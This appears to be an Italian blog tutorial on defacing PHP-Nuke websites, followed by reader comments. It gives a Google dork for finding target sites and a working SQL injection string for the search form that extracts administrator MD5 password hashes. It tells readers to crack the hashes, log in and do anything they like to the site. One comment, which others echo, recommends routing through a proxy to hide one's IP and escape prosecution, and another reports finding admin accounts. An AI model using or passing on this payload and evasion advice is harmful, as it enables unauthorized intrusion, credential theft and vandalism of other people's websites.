Defacciare in PhpNuke sfruttando un Exploit

Una delle cose più facili al mondo è defacciare in PhpNuke sfruttando un Exploit contenente una stringa SQL Injection nel form del search..
Andiamo sul motore di ricerca più famoso al mondo e inseriamo questa dorks:

CODICE
inurl:/phpnuke/modules.php?name=search

Fin qui tutto chiaro?

Google troverà una serie di siti creati in Php-Nuke. Cliccate su uno e vedremo il Search dove gli utenti scrivono per cercare una determinata informazione
Mettiamo questa stringa:

CODICE
p0hh0nsee%’) UNION ALL SELECT 1,2,aid,pwd,5,6,7,8,9,10 FROM nuke_authors/*

…e premiamo INVIO.
Se abbiamo avuto fortuna vedremo la password dell’admin in md5…Basta decriptarle e vedrete la pass pronta per il login!
In questo modo potete fare tutto quello che volete al sito!

14 Risposte to “Defacciare in PhpNuke sfruttando un Exploit”

  1. ma non ho capito devo scrivere su search di google inurl:/phpnuke/modules.php?name=search ?

  2. ago1980 Says:

    inurl:/phpnuke/modules.php?name=search .questo in google che ti trona tutti i siti phpnuke poi dentro al search del sito inserisci il code :p0hh0nsee%’) UNION ALL SELECT 1,2,aid,pwd,5,6,7,8,9,10 FROM nuke_authors/*

    …e premiamo INVIO.
    Se abbiamo avuto fortuna vedremo la password dell’admin in md5…Basta decriptarle e vedrete la pass pronta per il login!
    In questo modo potete fare tutto quello che volete al sito!

  3. grzie 10000^^

  4. aggiungi che conviene fare il tutto proxati altrimenti ti sgamano l’ip e potresti beccarti una denuncia.

    si puo navigare proxati andando qua https://www.megaproxy.com/freesurf/ e inserendo il sito nel quale si vuole entrare [megaproxy vi cambiera infatti l’indirizzo ip e potrete defacciare senza che, nel caso, becchino il vostro vero ip😉 ]

    p.s. megaproxy è uno dei tanti, ma è comodo perche fai tutto sul momento senza dover scaricare nulla

  5. ago1980 Says:

    grazie……bravo..ho dimenticato….XD .GRAZIE ANCORA…..

  6. ma poi per riavere il tuo ip come bisogna fare?????

  7. Io non ho capito… Dopo aver inserito quell’arringa del sito del search non mi appare nessuna password di niente…

  8. Si ma per decriptare la password, ci vorrà molto tempo perchè l’MD5 è composto da miliardi di miliardi di combinazioni diverse… Hai qualche programma per decryptarle? anche se ci mettono giorni…

  9. VorreiDiventareUnHacker... Says:

    °-° Non si Può Defacciare su forumfree.net? Lì ci sn cose interessanti!!!

  10. VorreiDiventareUnHacker... Says:

    Megaproxy non mi fa continuare…

  11. VorreiDiventareUnHacker... Says:

    scusa… Vorrei fare 2 kiakkiere insieme a te.. è possibile?

  12. VorreiDiventareUnHacker... Says:

    ma cos’è md5?

  13. ciao! bella guida molto utile. io trovato due admin. se entro in uno o nell’altro è lo stesso?

Lascia un commento

Inserisci i tuoi dati qui sotto o clicca su un'icona per effettuare l'accesso:

Logo WordPress.com

Stai commentando usando il tuo account WordPress.com. Chiudi sessione / Modifica )

Foto Twitter

Stai commentando usando il tuo account Twitter. Chiudi sessione / Modifica )

Foto di Facebook

Stai commentando usando il tuo account Facebook. Chiudi sessione / Modifica )

Google+ photo

Stai commentando usando il tuo account Google+. Chiudi sessione / Modifica )

Connessione a %s...

%d blogger cliccano Mi Piace per questo: